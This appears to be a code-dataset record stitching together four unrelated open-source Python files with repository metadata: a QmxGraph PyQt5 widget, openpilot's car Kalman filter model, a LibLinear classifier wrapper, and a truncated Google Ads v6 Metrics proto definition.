        A simple override of `QWidget.paintEvent`, required so that QSS
        rules take effect on `QWidget` subclasses.
From: http://doc.qt.io/qt-5/stylesheet-reference.html#qwidget-widget
:type paint_event: PyQt5.QtGui.QPaintEvent
"""
opt = QStyleOption()
opt.initFrom(self)
p = QPainter(self)
self.style().drawPrimitive(QStyle.PE_Widget, opt, p, self)
def load(self):
"""
Load graph drawing page, if not yet loaded.
"""
if not self.is_loaded() or not self._web_view.is_loading():
self._load_graph_page()
def is_loaded(self):
"""
:rtype: bool
:return: Is graph page already loaded?
"""
        # If graph initialization failed and it isn't running, do not
        # consider it loaded, as the graph and its API aren't safe for use
return self._web_view.is_loaded() and \
self._web_view.eval_js('graphs.isRunning()')
def blank(self):
"""
Blanks the graph drawing page, effectively clearing/unloading currently
displayed graph.
"""
if self._inspector_dialog:
self._inspector_dialog.close()
self._inspector_dialog = None
self._web_view.blank()
def set_error_bridge(self, bridge):
"""
Redirects errors on JavaScript code from graph drawing widget to
bridge.
:param ErrorHandlingBridge bridge: Handler for errors.
"""
self._error_bridge = bridge
if self.is_loaded():
self._web_view.add_to_js_window('bridge_error_handler', bridge)
def set_events_bridge(self, bridge):
"""
Redirects events fired by graph on JavaScript code to Python/Qt side
by using a bridge.
:param EventsBridge bridge: Bridge with event handlers.
"""
self._events_bridge = bridge
if self.is_loaded():
self._web_view.add_to_js_window('bridge_events_handler', bridge)
# Bind all known Python/Qt event handlers to JavaScript events
self.api.on_cells_added('bridge_events_handler.on_cells_added')
self.api.on_cells_removed('bridge_events_handler.on_cells_removed')
self.api.on_label_changed('bridge_events_handler.on_label_changed')
self.api.on_selection_changed(
'bridge_events_handler.on_selection_changed')
self.api.on_terminal_changed(
'bridge_events_handler.on_terminal_changed')
self.api.on_terminal_with_port_changed(
'bridge_events_handler.on_terminal_with_port_changed')
self.api.on_view_update(
'bridge_events_handler.on_view_update')
self.api.on_cells_bounds_changed(
'bridge_events_handler.on_cells_bounds_changed')
def set_double_click_handler(self, handler):
"""
Set the handler used for double click in cells of graph.
Unlike other event handlers, double click is exclusive to a single
handler. This follows underlying mxGraph implementation that works in
this manner, with the likely intention of enforcing a single
side-effect happening when a cell is double clicked.
:param callable|None handler: Handler that receives double clicked
cell id as only argument. If None it disconnects double click
handler from graph.
"""
self._set_private_bridge_handler(
self._double_click_bridge.on_double_click,
handler=handler,
setter=self._set_double_click_bridge,
)
def set_popup_menu_handler(self, handler):
"""
Set the handler used for popup menu (i.e. right-click) in cells of
graph.
Unlike other event handlers, popup menu is exclusive to a single
handler. This follows underlying mxGraph implementation that works in
this manner, with the likely intention of enforcing a single
side-effect happening when a cell is right-clicked.
:param callable|None handler: Handler that receives, respectively, id
of cell that was right-clicked, X coordinate in screen coordinates
and Y coordinate in screen coordinates as its three arguments. If
None it disconnects handler from graph.
"""
self._set_private_bridge_handler(
self._popup_menu_bridge.on_popup_menu,
handler=handler,
setter=self._set_popup_menu_bridge,
)
@property
def api(self):
"""
:rtype: qmxgraph.api.QmxGraphApi
:return: Proxy to API to manipulate graph.
"""
return self._api
# Web inspector -----------------------------------------------------------
def show_inspector(self):
"""
Show web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog:
from PyQt5.QtWebKit import QWebSettings
QWebSettings.globalSettings().setAttribute(
QWebSettings.DeveloperExtrasEnabled, True)
dialog = self._inspector_dialog = QDialog(self)
dialog.setWindowTitle("Web Inspector")
dialog.setWindowFlags(
dialog.windowFlags() | Qt.WindowMaximizeButtonHint)
dialog.resize(800, 600)
layout = QGridLayout(dialog)
layout.setContentsMargins(0, 0, 0, 0) # no margin to web view
from PyQt5.QtWebKitWidgets import QWebInspector
inspector = QWebInspector(dialog)
inspector.setSizePolicy(
QSizePolicy.Expanding, QSizePolicy.Expanding)
inspector.setPage(self.inner_web_view().page())
inspector.setVisible(True)
layout.addWidget(inspector)
self._inspector_dialog.show()
def hide_inspector(self):
"""
Hide web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog:
return
self._inspector_dialog.hide()
def toggle_inspector(self):
"""
Toggle visibility state of web inspector bound to QmxGraph page.
"""
if not self._inspector_dialog or \
not self._inspector_dialog.isVisible():
self.show_inspector()
else:
self.hide_inspector()
# Accessors recommended for debugging/testing only ------------------------
def inner_web_view(self):
"""
:rtype: QWebViewWithDragDrop
:return: Web view widget showing graph drawing page.
"""
return self._web_view
# Overridden events -------------------------------------------------------
def resizeEvent(self, event):
if self.is_loaded():
# Whenever graph widget is resized, it is going to resize
# underlying graph in JS to fit widget as well as possible.
width = event.size().width()
height = event.size().height()
self.api.resize_container(width, height)
event.ignore()
# Protected plumbing methods ----------------------------------------------
def _load_graph_page(self):
"""
Loads the graph drawing page in Qt's web view widget.
"""
mxgraph_path = self._mxgraph_path
own_path = self._own_path
html = render.render_embedded_html(
options=self._options,
styles=self._styles,
stencils=self._stencils,
mxgraph_path=mxgraph_path,
own_path=own_path,
)
from PyQt5.QtCore import QUrl
self._web_view.setHtml(html, baseUrl=QUrl('qrc:/'))
def _execute_on_load_finished(self):
"""
Several actions must be delayed until page finishes loading to take
effect.
"""
self_ref = weakref.ref(self)
def post_load(ok):
self_ = self_ref()
if not self_:
return
if ok:
# TODO: widget remain w/ disabled appearance even after enabled
# Allow user to interact with page again
# self_._web_view.setEnabled(True)
# There is a chance error handler is set before loaded. If so,
# register it on JS once page finishes loading.
if self_._error_bridge:
self_.set_error_bridge(self_._error_bridge)
if self_._events_bridge:
self_.set_events_bridge(self_._events_bridge)
self_._set_double_click_bridge()
self_._set_popup_menu_bridge()
width = self_.width()
height = self_.height()
self_.api.resize_container(width, height)
self_.loadFinished.emit(bool(ok and self_.is_loaded()))
self._web_view.loadFinished.connect(post_load)
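    # Note on the weakref above: `post_load` stays connected to the web view's
    # loadFinished signal, so holding only a weak reference keeps the closure
    # from extending the widget's lifetime; if the widget is gone by the time
    # the page finishes loading, the callback simply returns.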
def _on_drag_enter(self, event):
"""
:type event: QDragEnterEvent
"""
self._approve_only_dd_mime_type(event)
def _on_drag_move(self, event):
"""
:type event: QDragMoveEvent
"""
self._approve_only_dd_mime_type(event)
def _approve_only_dd_mime_type(self, event):
"""
Only approve events that contain QmxGraph's drag&drop MIME type.
:type event: QDragEnterEvent|QDragMoveEvent
"""
data = event.mimeData().data(constants.QGRAPH_DD_MIME_TYPE)
if not data.isNull():
event.acceptProposedAction()
else:
event.ignore()
def _on_drop(self, event):
"""
Adds to graph contents read from MIME data from drop event.
Note that new vertices are added centered at current mouse position.
:type event: QDropEvent
"""
data = event.mimeData().data(constants.QGRAPH_DD_MIME_TYPE)
if not data.isNull():
data_stream = QDataStream(data, QIODevice.ReadOnly)
parsed = json.loads(data_stream.readString().decode('utf8'))
# Refer to `mime.py` for docs about format
version = parsed['version']
if version not in (1, 2):
raise ValueError(
"Unsupported version of QmxGraph MIME data: {}".format(
version))
x = event.pos().x()
y = event.pos().y()
if version in (1, 2):
vertices = parsed.get('vertices', [])
scale = self.api.get_zoom_scale()
for v in vertices:
# place vertices with an offset so their center falls
# in the event point.
vertex_x = x + (v['dx'] - v['width'] * 0.5) * scale
vertex_y = y + (v['dy'] - v['height'] * 0.5) * scale
self.api.insert_vertex(
x=vertex_x,
y=vertex_y,
width=v['width'],
height=v['height'],
label=v['label'],
style=v.get('style', None),
tags=v.get('tags', {}),
)
if version in (2,):
decorations = parsed.get('decorations', [])
for v in decorations:
self.api.insert_decoration(
x=x,
y=y,
width=v['width'],
height=v['height'],
label=v['label'],
style=v.get('style', None),
tags=v.get('tags', {}),
)
event.acceptProposedAction()
else:
event.ignore()
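    # For reference, the payload parsed in _on_drop above has roughly this
    # shape once decoded (values are illustrative; see `mime.py` for the
    # authoritative format):
    # {
    #     "version": 2,
    #     "vertices": [{"dx": 0, "dy": 0, "width": 64, "height": 64,
    #                   "label": "...", "style": None, "tags": {}}],
    #     "decorations": [{"width": 32, "height": 32, "label": "...",
    #                      "style": None, "tags": {}}],
    # }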
def _set_double_click_bridge(self):
"""
Redirects double click events fired by graph on JavaScript code to
Python/Qt side by using a private bridge.
"""
if self.is_loaded():
bridge = self._double_click_bridge
self._web_view.add_to_js_window(
'bridge_double_click_handler', bridge)
self.api.set_double_click_handler(
'bridge_double_click_handler.on_double_click')
def _set_popup_menu_bridge(self):
"""
Redirects popup menu (i.e. right click) events fired by graph on
JavaScript code to Python/Qt side by using a private bridge.
"""
if self.is_loaded():
bridge = self._popup_menu_bridge
self._web_view.add_to_js_window(
'bridge_popup_menu_handler', bridge)
self.api.set_popup_menu_handler(
'bridge_popup_menu_handler.on_popup_menu')
def _set_private_bridge_handler(self, bridge_signal, handler, setter):
"""
        Helper method to set handler for private bridges like the ones used for
double click and popup menu events.
:param pyqtSignal bridge_signal: A Qt signal in bridge object.
:param callable|None handler: Handler of signal. If None it
disconnects handler from graph.
:param callable setter: Internal setter method used to set bridge in
QmxGraph object, only if already loaded.
"""
try:
bridge_signal.disconnect()
except TypeError:
# It fails if tries to disconnect without any handler connected.
pass
if handler:
bridge_signal.connect(handler)
if self.is_loaded():
setter()
class ErrorHandlingBridge(QObject):
"""
Error handler on JavaScript side will use `on_error` signal to communicate
    to Python any error that may have happened.
Client code must connect to signal and handle messages in whatever manner
desired.
"""
# JavaScript client code emits this signal whenever an error happens
#
# Arguments:
# msg: str
# url: str
# line: int
# column: int
on_error = pyqtSignal(str, str, int, int, name='on_error')
class EventsBridge(QObject):
"""
A bridge object between Python/Qt and JavaScript that provides a series
of signals that are connected to events fired on JavaScript.
:ivar pyqtSignal on_cells_removed: JavaScript client code emits this
signal when cells are removed from graph. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_cells_added: JavaScript client code emits this
signal when cells are added to graph. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_label_changed: JavaScript client code emits this
signal when cell is renamed. Arguments:
- cell_id: str
- new_label: str
- old_label: str
:ivar pyqtSignal on_selection_changed: JavaScript client code emits
this signal when the current selection change. Arguments:
- cell_ids: QVariantList
:ivar pyqtSignal on_terminal_changed: JavaScript client code emits
this signal when a cell terminal change. Arguments:
- cell_id: str
- terminal_type: str
- new_terminal_id: str
- old_terminal_id: str
:ivar pyqtSignal on_terminal_with_port_changed: JavaScript client code emits
this signal when a cell terminal change with port information. Arguments:
- cell_id: str
- terminal_type: str
- new_terminal_id: str
- new_terminal_port_id: str
- old_terminal_id: str
- old_terminal_port_id: str
:ivar pyqtSignal on_view_update: JavaScript client code emits this
signal when the view is updated. Arguments:
- graph_view: str
- scale_and_translation: QVariantList
:ivar pyqtSignal on_cells_bounds_changed: JavaScript client code emits
        this signal when some cells' bounds change. The argument `dict`
maps the affected `cell_id`s
to :class:`qmxgraph.cell_bounds.CellBounds` dict representations:
- changed_bounds: dict
    Using this object, connecting to events from JavaScript basically becomes a
matter of using Qt signals.
.. code-block::
def on_cells_added_handler(cell_ids):
print(f'added {cell_ids}')
def on_terminal_changed_handler(
cell_id, terminal_type, new_terminal_id, old_terminal_id):
print(
f'{terminal_type} of {cell_id} changed from'
f' {old_terminal_id} to {new_terminal_id}'
)
def on_cells_removed_handler(cell_ids):
print(f'removed {cell_ids}')
events_bridge = EventsBridge()
widget = ...
widget.set_events_bridge(events_bridge)
events_bridge.on_cells_added.connect(on_cells_added_handler)
events_bridge.on_cells_removed.connect(on_cells_removed_handler)
events_bridge.on_terminal_changed.connect(on_terminal_changed_handler)
"""
on_cells_removed = pyqtSignal('QVariantList', name='on_cells_removed')
on_cells_added = pyqtSignal('QVariantList', name='on_cells_added')
on_label_changed = pyqtSignal(str, str, str, name='on_label_changed')
on_selection_changed = pyqtSignal(
'QVariantList', name='on_selection_changed')
on_terminal_changed = pyqtSignal(
str, str, str, str, name='on_terminal_changed')
on_terminal_with_port_changed = pyqtSignal(
str, str, str, str, str, str, name='on_terminal_with_port_changed')
on_view_update = pyqtSignal(str, 'QVariantList', name='on_view_update')
on_cells_bounds_changed = pyqtSignal('QVariant', name='on_cells_bounds_changed')
class _DoubleClickBridge(QObject):
"""
A private bridge used for double click events in JavaScript graph.
It is private so `QmxGraph` can make sure only a single double click
handler is registered, to make sure it doesn't violate what is stated in
`set_double_click_handler` docs of `api` module.
"""
# Arguments:
# cell_id: str
on_double_click = pyqtSignal(str, name='on_double_click')
class _PopupMenuBridge(QObject):
"""
A private bridge used for popup menu events in JavaScript graph.
It is private so `QmxGraph` can make sure only a single popup menu handler
is registered, to make sure it doesn't violate what is stated in
`set_popup_menu_handler` docs of `api` module.
"""
# Arguments:
# cell_id: str
# x: int
# y: int
on_popup_menu = pyqtSignal(str, int, int, name='on_popup_menu')
|
mit
| -7,056,639,670,278,203,000
| 34.253012
| 96
| 0.600436
| false
| 4.238276
| false
| false
| false
|
commaai/openpilot
|
selfdrive/locationd/models/car_kf.py
|
1
|
4757
|
#!/usr/bin/env python3
import math
import sys
from typing import Any, Dict
import numpy as np
from selfdrive.locationd.models.constants import ObservationKind
from selfdrive.swaglog import cloudlog
from rednose.helpers.kalmanfilter import KalmanFilter
if __name__ == '__main__': # Generating sympy
import sympy as sp
from rednose.helpers.ekf_sym import gen_code
else:
from rednose.helpers.ekf_sym_pyx import EKF_sym # pylint: disable=no-name-in-module, import-error
i = 0
def _slice(n):
global i
s = slice(i, i + n)
i += n
return s
class States():
# Vehicle model params
STIFFNESS = _slice(1) # [-]
STEER_RATIO = _slice(1) # [-]
ANGLE_OFFSET = _slice(1) # [rad]
ANGLE_OFFSET_FAST = _slice(1) # [rad]
VELOCITY = _slice(2) # (x, y) [m/s]
YAW_RATE = _slice(1) # [rad/s]
STEER_ANGLE = _slice(1) # [rad]
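  # With the slices above, the 8-element state vector is laid out as
  #   [stiffness, steer_ratio, angle_offset, angle_offset_fast,
  #    v_x, v_y, yaw_rate, steer_angle]
  # which matches the ordering of CarKalman.initial_x and Q below.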
class CarKalman(KalmanFilter):
name = 'car'
initial_x = np.array([
1.0,
15.0,
0.0,
0.0,
10.0, 0.0,
0.0,
0.0,
])
# process noise
Q = np.diag([
(.05 / 100)**2,
.01**2,
math.radians(0.02)**2,
math.radians(0.25)**2,
.1**2, .01**2,
math.radians(0.1)**2,
math.radians(0.1)**2,
])
P_initial = Q.copy()
obs_noise: Dict[int, Any] = {
ObservationKind.STEER_ANGLE: np.atleast_2d(math.radians(0.01)**2),
ObservationKind.ANGLE_OFFSET_FAST: np.atleast_2d(math.radians(10.0)**2),
ObservationKind.STEER_RATIO: np.atleast_2d(5.0**2),
ObservationKind.STIFFNESS: np.atleast_2d(5.0**2),
ObservationKind.ROAD_FRAME_X_SPEED: np.atleast_2d(0.1**2),
}
global_vars = [
'mass',
'rotational_inertia',
'center_to_front',
'center_to_rear',
'stiffness_front',
'stiffness_rear',
]
@staticmethod
def generate_code(generated_dir):
dim_state = CarKalman.initial_x.shape[0]
name = CarKalman.name
    # vehicle model comes from The Science of Vehicle Dynamics: Handling, Braking, and Ride of Road and Race Cars
# Model used is in 6.15 with formula from 6.198
# globals
global_vars = [sp.Symbol(name) for name in CarKalman.global_vars]
m, j, aF, aR, cF_orig, cR_orig = global_vars
# make functions and jacobians with sympy
# state variables
state_sym = sp.MatrixSymbol('state', dim_state, 1)
state = sp.Matrix(state_sym)
# Vehicle model constants
x = state[States.STIFFNESS, :][0, 0]
cF, cR = x * cF_orig, x * cR_orig
angle_offset = state[States.ANGLE_OFFSET, :][0, 0]
angle_offset_fast = state[States.ANGLE_OFFSET_FAST, :][0, 0]
sa = state[States.STEER_ANGLE, :][0, 0]
sR = state[States.STEER_RATIO, :][0, 0]
u, v = state[States.VELOCITY, :]
r = state[States.YAW_RATE, :][0, 0]
A = sp.Matrix(np.zeros((2, 2)))
A[0, 0] = -(cF + cR) / (m * u)
A[0, 1] = -(cF * aF - cR * aR) / (m * u) - u
A[1, 0] = -(cF * aF - cR * aR) / (j * u)
A[1, 1] = -(cF * aF**2 + cR * aR**2) / (j * u)
B = sp.Matrix(np.zeros((2, 1)))
B[0, 0] = cF / m / sR
B[1, 0] = (cF * aF) / j / sR
x = sp.Matrix([v, r]) # lateral velocity, yaw rate
x_dot = A * x + B * (sa - angle_offset - angle_offset_fast)
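    # Written out, the lateral dynamics assembled above are the linear
    # single-track ("bicycle") model:
    #   v_dot = -(cF + cR)/(m*u) * v + (-(cF*aF - cR*aR)/(m*u) - u) * r
    #           + cF/(m*sR) * (sa - angle_offset - angle_offset_fast)
    #   r_dot = -(cF*aF - cR*aR)/(j*u) * v - (cF*aF**2 + cR*aR**2)/(j*u) * r
    #           + (cF*aF)/(j*sR) * (sa - angle_offset - angle_offset_fast)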
dt = sp.Symbol('dt')
state_dot = sp.Matrix(np.zeros((dim_state, 1)))
state_dot[States.VELOCITY.start + 1, 0] = x_dot[0]
state_dot[States.YAW_RATE.start, 0] = x_dot[1]
    # Basic discretization, 1st order integrator
# Can be pretty bad if dt is big
f_sym = state + dt * state_dot
#
# Observation functions
#
obs_eqs = [
[sp.Matrix([r]), ObservationKind.ROAD_FRAME_YAW_RATE, None],
[sp.Matrix([u, v]), ObservationKind.ROAD_FRAME_XY_SPEED, None],
[sp.Matrix([u]), ObservationKind.ROAD_FRAME_X_SPEED, None],
[sp.Matrix([sa]), ObservationKind.STEER_ANGLE, None],
[sp.Matrix([angle_offset_fast]), ObservationKind.ANGLE_OFFSET_FAST, None],
[sp.Matrix([sR]), ObservationKind.STEER_RATIO, None],
[sp.Matrix([x]), ObservationKind.STIFFNESS, None],
]
gen_code(generated_dir, name, f_sym, dt, state_sym, obs_eqs, dim_state, dim_state, global_vars=global_vars)
def __init__(self, generated_dir, steer_ratio=15, stiffness_factor=1, angle_offset=0): # pylint: disable=super-init-not-called
dim_state = self.initial_x.shape[0]
dim_state_err = self.P_initial.shape[0]
x_init = self.initial_x
x_init[States.STEER_RATIO] = steer_ratio
x_init[States.STIFFNESS] = stiffness_factor
x_init[States.ANGLE_OFFSET] = angle_offset
# init filter
self.filter = EKF_sym(generated_dir, self.name, self.Q, self.initial_x, self.P_initial, dim_state, dim_state_err, global_vars=self.global_vars, logger=cloudlog)
if __name__ == "__main__":
generated_dir = sys.argv[2]
CarKalman.generate_code(generated_dir)
|
mit
| 7,562,025,558,407,216,000
| 27.656627
| 164
| 0.615304
| false
| 2.669473
| false
| false
| false
|
excelly/xpy-ml
|
ex/ml/liblinear.py
|
1
|
3853
|
from common import *
import ex.ml.libsvm.linearutil as lu
def a2l(X, y = None):
'''convert arrays to list
'''
if y is not None:
y = y.tolist()
if issparse(X):
X = [dict(zip(find(row)[1], row.data)) for row in X]
else:
X = X.tolist()
if y is not None:
return (X, y)
else:
return X
class LibLinear:
'''liblinear
'''
    def __init__(self):
self.n, self.dim, self.options, self.model, self.ulabels, self.preproc_param = [None]*6
def Train(self, X, y, options = None):
''' train libsvm model
'''
# process labels
y = int32(y)
self.ulabels = unique(y)
K = len(self.ulabels)
check(K > 1, 'needs at least 2 classes')
y = EncodeArray(y, self.ulabels)
# process features
self.n, self.dim = X.shape
X, self.preproc_param = Normalize(X, '+-1', 'col')
# train
X, y = a2l(X, y)
if options is None: # default parameter
options = ''
self.model = lu.train(y, X, options + ' -B 1 -q')
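        # In LIBLINEAR's option syntax, '-B 1' appends a constant bias feature
        # to every instance and '-q' silences training output; labels arrive
        # already re-encoded to 0..K-1 and features column-normalized to the
        # '+-1' range by the preprocessing above.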
def Predict(self, X):
''' predict for test data
'''
# apply preprocessing
X = Normalize(X, self.preproc_param, 'col')[0]
X = a2l(X)
t, acc, P = lu.predict(zeros(len(X), dtype = int32), X, self.model, '')
t = arr(t, dtype = 'int32')
P = arr(P)
# extract results
t = self.ulabels[t]
p=P.max(1)
return (t, p, P)
def CV(self, nfolds, X, y, options = None, verbose = True, poolsize = 1):
''' get cross-validation performance
'''
cvo = CVObject(y.size, nfolds)
if verbose:
log.info('Cross-validating MultiLogistic. Data = {0}'.format(X.shape))
log.info(cvo)
trI, teI, perf = cvo.CV(ipred, X, y, options, poolsize)
t, p = unzip(perf)
idx = arr(Flatten(teI))
t = arr(Flatten(t), int32)
p = arr(Flatten(p))
t[idx]=t.copy()
p[idx]=p.copy()
return (t, p)
def Clone(self):
return deepcopy(self)
def Save(self, filename):
SavePickle(filename, self)
def Load(self, filename):
o=LoadPickles(filename)
Copy(o, self)
def Plot(self, xlim, ylim, color = 'label', gridsize = 50):
'''plot the current classifier
'''
check(self.dim == 2, 'can only plot in 2-D space')
X, Y = MeshGrid(linspace(xlim[0], xlim[1], gridsize),
linspace(ylim[0], ylim[1], gridsize))
F = hstack((col(X), col(Y)))
y, p = self.Predict(F)[:2]
if color == 'label':
scatter(X.ravel(), Y.ravel(), c = y, edgecolors = 'none')
elif color == 'prob':
scatter(X.ravel(), Y.ravel(), c = p, vmin = 0, vmax = 1, edgecolors = 'none')
draw()
def ipred(trI, teI, X, y, options):
'''used for cross validation
'''
model = LibLinear()
model.Train(X[trI], y[trI], options)
t, p, P = model.Predict(X[teI])
return (t.tolist(), p.tolist())
if __name__ == '__main__':
InitLog()
n = 100
pts = vstack((repmat(linspace(-1, 1, n/2), (1, 2)),
hstack((sin(linspace(0, 10, n/2)) + 1, sin(linspace(0, 10, n/2)) - 1)))).T
y = cat((ones(n/2)*3, ones(n/2)*7))
model = LibLinear()
t, p = model.CV(10, pts, y)
acc = (t == y).mean()
print '** Acc: %f' % acc
test(acc > 0.95, "LibSVM Train & Test & CV")
model.Train(pts, y)
t, p, P = model.Predict(pts)
acc = (y == t).mean()
print '** Acc: %f' % acc
subplot(gcf(), 131);
plot(pts[:,0], pts[:,1], '+')
subplot(gcf(), 132)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'label', 100)
subplot(gcf(), 133)
model.Plot(GetRange(pts[:,0]), GetRange(pts[:,1]), 'prob', 100)
show()
|
apache-2.0
| -1,892,333,781,465,634,600
| 24.516556
| 95
| 0.509473
| false
| 3.062798
| false
| false
| false
|
googleads/google-ads-python
|
google/ads/googleads/v6/common/types/metrics.py
|
1
|
42787
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import interaction_event_type
from google.ads.googleads.v6.enums.types import quality_score_bucket
__protobuf__ = proto.module(
package="google.ads.googleads.v6.common",
marshal="google.ads.googleads.v6",
manifest={"Metrics",},
)
class Metrics(proto.Message):
r"""Metrics data.
Attributes:
absolute_top_impression_percentage (float):
The percent of your ad impressions that are
shown as the very first ad above the organic
search results.
active_view_cpm (float):
Average cost of viewable impressions
(``active_view_impressions``).
active_view_ctr (float):
Active view measurable clicks divided by
active view viewable impressions. This metric is
reported only for display network.
active_view_impressions (int):
A measurement of how often your ad has become
viewable on a Display Network site.
active_view_measurability (float):
The ratio of impressions that could be
measured by Active View over the number of
served impressions.
active_view_measurable_cost_micros (int):
The cost of the impressions you received that
were measurable by Active View.
active_view_measurable_impressions (int):
The number of times your ads are appearing on
placements in positions where they can be seen.
active_view_viewability (float):
The percentage of time when your ad appeared
on an Active View enabled site (measurable
impressions) and was viewable (viewable
impressions).
all_conversions_from_interactions_rate (float):
            All conversions from interactions (as opposed
            to view-through conversions) divided by the
number of ad interactions.
all_conversions_value (float):
The value of all conversions.
all_conversions_value_by_conversion_date (float):
The value of all conversions. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric.
all_conversions_by_conversion_date (float):
The total number of conversions. This includes all
conversions regardless of the value of
include_in_conversions_metric. When this column is selected
with date, the values in date column means the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
all_conversions_value_per_cost (float):
The value of all conversions divided by the
total cost of ad interactions (such as clicks
for text ads or views for video ads).
all_conversions_from_click_to_call (float):
The number of times people clicked the "Call"
button to call a store during or after clicking
an ad. This number doesn't include whether or
not calls were connected, or the duration of any
calls. This metric applies to feed items only.
all_conversions_from_directions (float):
The number of times people clicked a "Get
directions" button to navigate to a store after
clicking an ad. This metric applies to feed
items only.
all_conversions_from_interactions_value_per_interaction (float):
The value of all conversions from
interactions divided by the total number of
interactions.
all_conversions_from_menu (float):
The number of times people clicked a link to
view a store's menu after clicking an ad.
This metric applies to feed items only.
all_conversions_from_order (float):
The number of times people placed an order at
a store after clicking an ad. This metric
applies to feed items only.
all_conversions_from_other_engagement (float):
The number of other conversions (for example,
posting a review or saving a location for a
store) that occurred after people clicked an ad.
This metric applies to feed items only.
all_conversions_from_store_visit (float):
Estimated number of times people visited a
store after clicking an ad. This metric applies
to feed items only.
all_conversions_from_store_website (float):
The number of times that people were taken to
a store's URL after clicking an ad.
This metric applies to feed items only.
average_cost (float):
The average amount you pay per interaction.
This amount is the total cost of your ads
divided by the total number of interactions.
average_cpc (float):
The total cost of all clicks divided by the
total number of clicks received.
average_cpe (float):
The average amount that you've been charged
for an ad engagement. This amount is the total
cost of all ad engagements divided by the total
number of ad engagements.
average_cpm (float):
Average cost-per-thousand impressions (CPM).
average_cpv (float):
The average amount you pay each time someone
views your ad. The average CPV is defined by the
total cost of all ad views divided by the number
of views.
average_page_views (float):
Average number of pages viewed per session.
average_time_on_site (float):
Total duration of all sessions (in seconds) /
number of sessions. Imported from Google
Analytics.
benchmark_average_max_cpc (float):
An indication of how other advertisers are
bidding on similar products.
benchmark_ctr (float):
An indication on how other advertisers'
Shopping ads for similar products are performing
based on how often people who see their ad click
on it.
bounce_rate (float):
Percentage of clicks where the user only
visited a single page on your site. Imported
from Google Analytics.
clicks (int):
The number of clicks.
combined_clicks (int):
The number of times your ad or your site's
listing in the unpaid results was clicked. See
the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
combined_clicks_per_query (float):
The number of times your ad or your site's listing in the
unpaid results was clicked (combined_clicks) divided by
combined_queries. See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
combined_queries (int):
The number of searches that returned pages
from your site in the unpaid results or showed
one of your text ads. See the help page at
https://support.google.com/google-
ads/answer/3097241 for details.
content_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Display Network but
didn't because your budget was too low. Note:
Content budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
content_impression_share (float):
The impressions you've received on the
Display Network divided by the estimated number
of impressions you were eligible to receive.
Note: Content impression share is reported in
the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
conversion_last_received_request_date_time (str):
The last date/time a conversion tag for this
conversion action successfully fired and was
seen by Google Ads. This firing event may not
have been the result of an attributable
conversion (e.g. because the tag was fired from
a browser that did not previously click an ad
from an appropriate advertiser). The date/time
is in the customer's time zone.
conversion_last_conversion_date (str):
The date of the most recent conversion for
this conversion action. The date is in the
customer's time zone.
content_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Display Network that your ads didn't receive
due to poor Ad Rank. Note: Content rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
conversions_from_interactions_rate (float):
Conversions from interactions divided by the number of ad
interactions (such as clicks for text ads or views for video
ads). This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_value (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_value_by_conversion_date (float):
The value of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
conversions_value_per_cost (float):
The value of conversions divided by the cost of ad
interactions. This only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
conversions_from_interactions_value_per_interaction (float):
The value of conversions from interactions divided by the
number of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
conversions_by_conversion_date (float):
The number of conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions. When this
column is selected with date, the values in date column
means the conversion date. Details for the
by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
cost_micros (int):
The sum of your cost-per-click (CPC) and
cost-per-thousand impressions (CPM) costs during
this period.
cost_per_all_conversions (float):
The cost of ad interactions divided by all
conversions.
cost_per_conversion (float):
The cost of ad interactions divided by conversions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
cost_per_current_model_attributed_conversion (float):
The cost of ad interactions divided by current model
attributed conversions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
cross_device_conversions (float):
Conversions from when a customer clicks on a Google Ads ad
on one device, then converts on a different device or
browser. Cross-device conversions are already included in
all_conversions.
ctr (float):
The number of clicks your ad receives
(Clicks) divided by the number of times your ad
is shown (Impressions).
current_model_attributed_conversions (float):
Shows how your historic conversions data would look under
the attribution model you've currently selected. This only
includes conversion actions which
